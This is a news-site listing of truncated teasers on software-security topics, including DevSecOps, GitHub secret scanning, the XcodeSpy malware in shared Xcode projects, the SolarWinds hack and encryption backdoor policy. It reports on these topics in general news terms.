The necessary evolution to DevSecOps: Building security into the development lifecycle

Hindsight is a wonderful thing. Looking back on the early stages of DevOps, one moment of 20/20 clarity is that if people were doing it right from the beginning, there would be no need to change DevOps to DevSecOps. Security should have been part of the approach from the start.

Security should always be fundamental, but in a rush to develop new ideas or to deliver applications faster, it may get overlooked. This is – ironically - precisely what happened with DevOps. Establishing...

GitHub’s secret scanning for private repos launches alongside security overview

GitHub has launched its secret scanning tool for private repositories alongside a new security overview dashboard.

The world’s largest repo host first unveiled the fraud-preventing secret scanning feature in May last year as part of GitHub Advanced Security—a package of features that includes code scanning, secret scanning, and dependency reviews.

Secret scanning has been in beta until today. Since it was first announced, GitHub says it has:

Expanded secret...

Hackers are using shared Xcode projects to infect Apple developers

Developers for Apple’s platforms are being hacked through importing shared Xcode projects infected with malware.

Researchers from SentinelOne detailed the growing trend after discovering a macOS malware dubbed XcodeSpy.

“Threat actors are abusing the Run Script feature in Apple’s Xcode IDE to infect unsuspecting Apple Developers via shared Xcode Projects,” the researchers explained.

“XcodeSpy is a malicious Xcode project that installs a custom variant...

Microsoft: Over 1,000 developers contributed to SolarWinds hack

According to Microsoft’s analysis of the devastating SolarWinds hack, over 1,000 developers were involved.

The attack was described as “the largest and most sophisticated attack the world has ever seen,” by Microsoft president Brad Smith on US show 60 Minutes.

SolarWinds develops software to help businesses manage their networks, systems, and IT infrastructure. The company’s Orion solution is used by ~33,000 public and private sector customers.

In...

Corellium enables iOS device virtualisation on individual accounts

Security research firm Corellium has enabled the virtualisation of iOS devices on individual accounts.

Corellium won a lawsuit filed against it by Apple in December which led to this week’s policy change.

In the lawsuit, first filed in 2019, Apple alleged Corellium's virtualisation violated copyrights relating to iOS, iTunes, and UI. However, the court ruled in Corellium’s favour after deeming the company’s virtualisation comes under fair use.

Virtual iOS...

What app developers need to know about the DOJ’s formal request for encryption backdoors

When we text via Apple’s iMessage, WhatsApp, Signal, or a host of other messaging services, those messages are protected in ways communications across most other platforms are not. The reason is these select app developers use “end-to-end encryption” (or “E2EE”), which encrypts all messages before leaving the sender’s device and can only be decrypted by the recipient’s device. The only way to access and view these messages is by having the sender’s or recipient’s phone...

‘Missions’ teach secure code practices to all those new programmers

Secure Code Warrior has launched ‘Missions’ to help teach safe coding practices during a time when more people are learning to code than ever.

As we reported in September, one in four people used their extra time at home during the first COVID-19 lockdown to start coding. With second lockdowns now in many countries, it’s likely even more people have taken their first steps in programming.

While the world could always do with more coders, the pandemic has also...

Why you need honeypots in the cloud: A guide

IT threats such as cyberattacks, worms, viruses, and other digital threats are valid concerns for anyone who connects their systems to the internet.

Businesses that operate digitally - in other words, using the cloud - are especially vulnerable to a variety of cyber threats; some of them not yet known even to security companies.

Security mechanisms such as honeypots can detect various types of attacks, whether it is a server, router, cloud, network, or...

How to ensure your security tools work with testing for security validation

Realising that your security systems have vulnerabilities after a cyber-attack could significantly damage both your company’s reputation and profit. If your organisation or company is online and digital, security systems might be in place, but you might not be sure they truly work.

A good security validation approach is based on testing current cybersecurity with tools that can save your company from major financial losses and data leakage.

Is your business likely to be a...

Decentralised platform Ethereum is hiring a dedicated security team for 2.0

The Ethereum Foundation is hiring a dedicated security team to ensure the next version of the decentralised platform is as robust as it needs to be.

A lot of money relies on the security of Ethereum. The explosion in DeFi (decentralised finance) means there is now $4.3 billion "locked up" in Ethereum apps – an increase of 442% over the past three months. Yet, this is tiny compared to the figures we could be discussing in a few years as DeFi growth continues and more use cases...